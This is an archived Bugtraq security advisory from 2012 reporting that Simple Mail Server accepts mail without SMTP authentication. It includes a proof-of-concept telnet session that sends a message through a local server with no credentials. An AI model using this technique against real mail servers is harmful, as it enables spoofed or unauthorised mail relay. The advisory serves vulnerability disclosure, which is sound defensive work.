| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201201081510.q08FA0Kq021890@sf01web2.securityfocus.com> Date: Sun, 8 Jan 2012 15:10:00 GMT From: demonalex@....com To: bugtraq@...urityfocus.com Subject: Simple Mail Server - SMTP Authentication Bypass Vulnerability Title: Simple Mail Server - SMTP Authentication Bypass Vulnerability Software : Simple Mail Server Software Version : 2011-12-30 Vendor: http://simplemailsvr.sourceforge.net/ Class: Origin Validation Error CVE: Remote: Yes Local: No Published: 2012-01-08 Updated: CVSS2 Base: 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P) Impact : Medium (4 < 6.4 < 8) Bug Description : Simple Mail Server is a tiny Mail Server written in C#. It can be sent mail without password by using usual tcp client(such as telnet). And it did not have SMTP authentication contoller. POC(Remarks: domain alex.com and user alex@...x.com must be exists in configuration for this test case): >telnet 127.0.0.1 25 220 TEST-121F797342 SMTP ready. EHLO mail_of_alert 500 Not supported. Use HELO MAIL FROM: <alex@...x.com> 250 OK RCPT TO: <alex@...x.com> 250 OK Data 354 Start mail input; end with <CRLF>.<CRLF> From: "alex@...x.com" <alex@...x.com> To: "alex@...x.com" <alex@...x.com> Subject: authenticate is not required!
Powered by blists - more mailing lists